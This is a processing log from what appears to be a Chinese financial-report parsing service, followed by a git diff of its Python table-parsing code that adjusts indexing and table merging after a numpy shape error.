2024-12-29 16:17:44,901|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (23572)...
2024-12-29 16:17:46,495|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (39604)...
2024-12-29 16:17:47,899|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (4076)...
2024-12-29 16:17:47,899|zzb_logger : INFO 等待所有子任务完成,任务ID:201917
2024-12-29 16:18:02,194|zzb_logger : INFO word表格中 text解析完成,任务ID:201917
2024-12-29 16:18:02,196|zzb_logger : INFO 开始解析word表表格中的table,任务ID:201917
2024-12-29 16:18:03,525|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36176)...
2024-12-29 16:18:04,585|zzb_logger : INFO Task 解析表格201917 runs 1.06 seconds.
2024-12-29 16:18:04,873|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (35368)...
2024-12-29 16:18:05,769|zzb_logger : INFO Task 解析表格201917 runs 0.90 seconds.
2024-12-29 16:18:06,263|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (33004)...
2024-12-29 16:18:07,225|zzb_logger : INFO Task 解析表格201917 runs 0.96 seconds.
2024-12-29 16:18:07,628|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (30764)...
2024-12-29 16:18:08,427|zzb_logger : INFO Task 解析表格201917 runs 0.80 seconds.
2024-12-29 16:18:08,976|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (29608)...
2024-12-29 16:18:09,864|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
2024-12-29 16:18:10,588|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (5404)...
2024-12-29 16:18:11,360|zzb_logger : INFO Task 解析表格201917 runs 0.77 seconds.
2024-12-29 16:18:11,966|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36200)...
2024-12-29 16:18:12,030|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36328)...
2024-12-29 16:18:12,892|zzb_logger : INFO Task 解析表格201917 runs 0.93 seconds.
2024-12-29 16:18:13,034|zzb_logger : INFO Task 解析表格201917 runs 1.00 seconds.
2024-12-29 16:18:13,392|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39712)...
2024-12-29 16:18:14,166|zzb_logger : INFO Task 解析表格201917 runs 0.77 seconds.
2024-12-29 16:18:15,030|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (17184)...
2024-12-29 16:18:15,084|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (38828)...
2024-12-29 16:18:15,156|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39596)...
2024-12-29 16:18:15,194|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36908)...
2024-12-29 16:18:15,268|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (38088)...
2024-12-29 16:18:15,273|zzb_logger : INFO 解析表格时出现了异常 setting an array element with a sequence. The requested array has an inhomogeneous shape after 1 dimensions. The detected shape was (8,) + inhomogeneous part. 内容为{'type': 'table', 'index': 1438, 'data': [['项目', '期末', '期末', '期末', '期末', '期末', '期初', '期初', '期初', '期初', '期初', '期初', '期初', '期初'], ['', '账面余额', '账面价值', '受限类型', '受限情况', '受限情况', '账面余额', '账面余额', '账面价值', '账面价值', '受限类型', '受限类型', '受限情况', ''], ['货币资金', '485,532.72', '485,532.72', '', '住房专用基金', '住房专用基金', '482,151.75', '482,151.75', '482,151.75', '482,151.75', '', '', '住房专用基金', ''], ['固定资产', '9,798,299.46', '9,798,299.46', '', '金融机构借款抵押', '3,747,470.09', '3,747,470.09', '3,747,470.09', '3,747,470.09', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['无形资产', '7,982,261.87', '7,982,261.87', '', '金融机构借款抵押', '5,437,462.92', '5,437,462.92', '5,437,462.92', '5,437,462.92', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['货币资金', '43,997,452.57', '43,997,452.57', '', '银行保证金', '63,388,483.00', '63,388,483.00', '63,388,483.00', '63,388,483.00', '', '', '银行保证金', '银行保证金'], ['投资性房地产', '62,041,831.52', '62,041,831.52', '', '金融机构借款抵押', '67,653,392.10', '67,653,392.10', '67,653,392.10', '67,653,392.10', '', '', '金融机构借款抵押', '金融机构借款抵押'], ['合计', '124,305,378.14', '124,305,378.14', '', '', '140,708,959.86', '140,708,959.86', '140,708,959.86', '140,708,959.86', '', '', '', '']]}
2024-12-29 16:18:15,722|zzb_logger : INFO Task 解析表格201917 runs 0.69 seconds.
2024-12-29 16:18:15,873|zzb_logger : INFO Task 解析表格201917 runs 0.79 seconds.
2024-12-29 16:18:16,067|zzb_logger : INFO Task 解析表格201917 runs 0.91 seconds.
2024-12-29 16:18:16,086|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
2024-12-29 16:18:16,158|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
2024-12-29 16:18:16,787|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39052)...
2024-12-29 16:18:16,847|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (35928)...
2024-12-29 16:18:17,456|zzb_logger : INFO Task 解析表格201917 runs 0.61 seconds.
2024-12-29 16:18:17,644|zzb_logger : INFO Task 解析表格201917 runs 0.86 seconds.
2024-12-29 16:18:17,819|zzb_logger : INFO word表格中 table解析完成,任务ID:201917
2024-12-29 16:18:17,985|zzb_logger : INFO 解析任务 201917 完成,耗时62.29 秒。
2024-12-29 16:18:18,106|zzb_logger : INFO 通知开始抽取指标url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=6
2024-12-29 16:18:18,106|zzb_logger : INFO 通知开始抽取指标状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 404</p>
<p>Message: File not found.</p>
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
</body>
</html>

2024-12-29 16:18:18,107|zzb_logger : INFO 开始表格指标抽取,任务ID:201917
2024-12-29 16:18:20,187|zzb_logger : INFO 提取指标任务 0-10 (29656)...
2024-12-29 16:18:21,575|zzb_logger : INFO 提取指标任务 10-20 (38952)...
2024-12-29 16:18:22,849|zzb_logger : INFO 提取指标任务 20-30 (31900)...
2024-12-29 16:18:24,192|zzb_logger : INFO 提取指标任务 30-40 (30420)...
2024-12-29 16:18:25,554|zzb_logger : INFO 提取指标任务 40-50 (32448)...
2024-12-29 16:18:26,909|zzb_logger : INFO 提取指标任务 50-60 (37708)...
2024-12-29 16:18:28,305|zzb_logger : INFO 提取指标任务 60-70 (36136)...
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,933|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,934|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,935|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,936|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,941|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,942|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况大额销货退回的详细情况
2024-12-29 16:18:28,943|zzb_logger : INFO 被删除的字符: 不适用不适用
2024-12-29 16:18:29,637|zzb_logger : INFO 提取指标任务 70-80 (39120)...
2024-12-29 16:18:42,814|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:42,815|zzb_logger : INFO 被删除的字符: 000000
2024-12-29 16:18:46,511|zzb_logger : INFO 提取指标 40-50 runs 20.96 seconds.
2024-12-29 16:18:54,027|zzb_logger : INFO 提取指标 70-80 runs 24.39 seconds.
2024-12-29 16:19:17,236|zzb_logger : INFO 提取指标 60-70 runs 48.93 seconds.
2024-12-29 16:19:20,151|zzb_logger : INFO 提取指标 30-40 runs 55.96 seconds.
2024-12-29 16:19:40,383|zzb_logger : INFO 提取指标 50-60 runs 73.47 seconds.
2024-12-29 16:20:06,573|zzb_logger : INFO 提取指标 0-10 runs 106.39 seconds.
2024-12-29 16:20:44,937|zzb_logger : INFO 提取指标 10-20 runs 143.36 seconds.
2024-12-29 16:20:50,959|zzb_logger : INFO 提取指标 20-30 runs 148.11 seconds.
2024-12-29 16:20:51,337|zzb_logger : INFO 表格指标抽取完成,任务ID:201917
2024-12-29 16:20:51,337|zzb_logger : INFO 表格指标抽取 201917 完成,耗时153.23 秒。
2024-12-29 16:20:51,337|zzb_logger : INFO 启动这个指标归一化任务ID-修改测试:201917
2024-12-29 16:20:51,549|zzb_logger : INFO 目录黑名单为:[]
2024-12-29 16:20:52,316|zzb_logger : INFO 向量配置数据查询 0.11 秒。
2024-12-29 16:20:52,317|zzb_logger : INFO insert_table_measure_from_vector_async_process方法走的半年报
2024-12-29 16:20:54,191|zzb_logger : INFO Run task 0-351 (41216)...
2024-12-29 16:20:54,192|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:54,742|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:20:55,664|zzb_logger : INFO Run task 351-702 (16388)...
2024-12-29 16:20:55,664|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:56,152|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:20:57,120|zzb_logger : INFO Run task 702-1053 (41796)...
2024-12-29 16:20:57,120|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:57,611|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:20:58,818|zzb_logger : INFO Run task 1053-1404 (39320)...
2024-12-29 16:20:58,818|zzb_logger : INFO 插入数据 2815
2024-12-29 16:20:59,324|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:00,159|zzb_logger : INFO Run task 1404-1755 (41868)...
2024-12-29 16:21:00,159|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:00,887|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:01,473|zzb_logger : INFO Run task 1755-2106 (26816)...
2024-12-29 16:21:01,473|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:02,171|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:02,832|zzb_logger : INFO Run task 2106-2457 (32120)...
2024-12-29 16:21:02,832|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:03,703|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:21:04,179|zzb_logger : INFO 等待所有子任务完成,任务ID:201917
2024-12-29 16:21:04,179|zzb_logger : INFO Run task 2457-2815 (38332)...
2024-12-29 16:21:04,179|zzb_logger : INFO 插入数据 2815
2024-12-29 16:21:04,886|zzb_logger : INFO 黑名单的值是[54, 144, 154, 708, 709, 537, 841, 460, 753, 762, 770, 1155, 787, 1805, 1841, 1633, 1760]和['49', '50', '53', '54', '143', '144', '147', '148', '154', '365', '158', '473', '274', '474', '87', '476', '277', '171', '278', '384', '489', '587', '280', '178', '180', '285', '187', '193', '506', '708', '709', '620', '621', '622', '629', '218', '219', '221', '823', '227', '536', '636', '537', '925', '542', '544', '926', '441', '551', '239', '839', '840', '841', '454', '842', '843', '568', '943', '944', '569', '460', '753', '945', '571', '946', '572', '574', '762', '954', '585', '955', '770', '1150', '960', '1274', '1154', '347', '1155', '787', '1289', '1163', '1166', '1401', '1171', '1176', '983', '885', '985', '1179', '986', '1312', '987', '805', '1315', '988', '1185', '989', '1558', '1316', '1321', '992', '1191', '1561', '993', '1322', '994', '1328', '995', '1109', '1195', '1432', '1688', '1333', '1000', '1198', '1805', '1337', '1438', '1341', '1809', '1206', '1344', '1696', '1697', '1814', '1347', '1701', '1125', '917', '1353', '1210', '1703', '919', '1708', '920', '1213', '1825', '924', '1711', '1214', '1606', '1369', '1457', '1714', '1218', '1460', '1835', '1720', '1614', '1841', '1723', '1223', '1618', '1844', '1623', '1847', '1386', '1849', '1735', '1851', '1389', '1633', '1477', '1857', '1736', '1234', '1393', '1480', '1738', '1636', '1240', '1398', '1486', '1743', '1643', '1746', '1870', '1250', '1751', '1873', '1254', '1882', '1257', '1760', '1887', '1762', '1266', '1763', '1894', '1775', '1913', '1782', '1793', '1543']以及新增的[]
2024-12-29 16:23:00,285|zzb_logger : INFO 所有子任务完成,任务ID:201917
2024-12-29 16:23:00,286|zzb_logger : INFO 启动指标归一化任务ID:201917
2024-12-29 16:23:00,286|zzb_logger : INFO 向量更新时间 127.97 秒。
2024-12-29 16:23:00,474|zzb_logger : INFO 更新数据查询 0.17 秒。
2024-12-29 16:23:00,474|zzb_logger : INFO update_ori_measure方法走的是半年报
2024-12-29 16:23:00,474|zzb_logger : INFO 更新数据更新 0.00 秒。
2024-12-29 16:23:00,522|zzb_logger : INFO 更新数据写入 0.05 秒。
2024-12-29 16:23:00,522|zzb_logger : INFO 归一化完成任务ID:201917
2024-12-29 16:23:00,522|zzb_logger : INFO 任务 201917 完成,耗时344.83 秒。
2024-12-29 16:23:00,669|zzb_logger : INFO 通知任务状态url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=1
2024-12-29 16:23:00,669|zzb_logger : INFO 通知任务状态任务:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 404</p>
<p>Message: File not found.</p>
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
</body>
</html>

2024-12-29 16:23:00,821|zzb_logger : INFO 任务 201917 完成

@ -427,19 +427,18 @@ def process_text_content(file_id,texts,tables,full_texts,type =0):
                "type" : "text",
                'content' : line_text,
            }},conn,cursor,"word_parse_process")

        # Used by the restricted-words (慎用词) check
        db_service_word.insert_word_parse_process({
            'file_id': file_id,
            'page_num': t["index"],
            'page_count': 100,
            'type': 'text',
            'content': {
                'page_num': t["index"],
                'table_index': t["index"],
                "type": "text",
                'content': line_text,
            }}, conn, cursor, "word_parse_data")
        # Used by the restricted-words (慎用词) check
        db_service_word.insert_word_parse_process({
            'file_id': file_id,
            'page_num': t["index"],
            'page_count': 100,
            'type': 'text',
            'content': {
                'page_num': t["index"],
                'table_index': t["index"],
                "type": "text",
                'content': line_text,
            }}, conn, cursor, "word_parse_data")

    table_name = "word_text_info"
    if type == 1:

@ -519,12 +518,12 @@ def get_table_measure(file_id, word_tables, record_range):
    record_start = record_range.split('-')[0]
    record_end = record_range.split('-')[1]
    for index in range(int(record_start),int(record_end)):
        t = word_tables[index]
        t = word_tables[index][0]
        measure_obj =[]
        data_dict = {}
        measure_list = []
        try:
            arr = np.array(t['data'])
            arr = np.array(t["data"])
            rows, cols = arr.shape
            if rows == 1 and cols == 1:
                continue
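
The deleted log above shows exactly this `np.array(t['data'])` call failing with an "inhomogeneous shape" error when table rows have unequal lengths. A defensive sketch that pads ragged rows before shaping (the padding value is an assumption, not the project's actual fix):

    def to_rect_array(rows, fill=''):
        # Pad every row to the longest width so np.array yields a clean 2-D shape
        width = max(len(r) for r in rows)
        return np.array([list(r) + [fill] * (width - len(r)) for r in rows])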
@ -679,7 +678,7 @@ def update_measure_data(file_id,file_path,parent_table_pages):
    # Create a cursor for executing SQL statements
    cursor_app = conn_app.cursor(buffered=True)
    applog.info(f'目录黑名单为:{parent_table_pages}')
    db_service_word.delete_to_run(conn,cursor,file_id)
    # db_service_word.delete_to_run(conn,cursor,file_id)
    db_service_word.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path)

    # Measure normalization
@ -692,15 +691,39 @@ def update_measure_data(file_id,file_path,parent_table_pages):

def merge_consecutive_arrays(word_info):
    merged_objects = []
    temp_list = []

    for info_obj in word_info:
        try:
            if info_obj['type'] == 'table':
                # Tables: track them so header-less continuation fragments
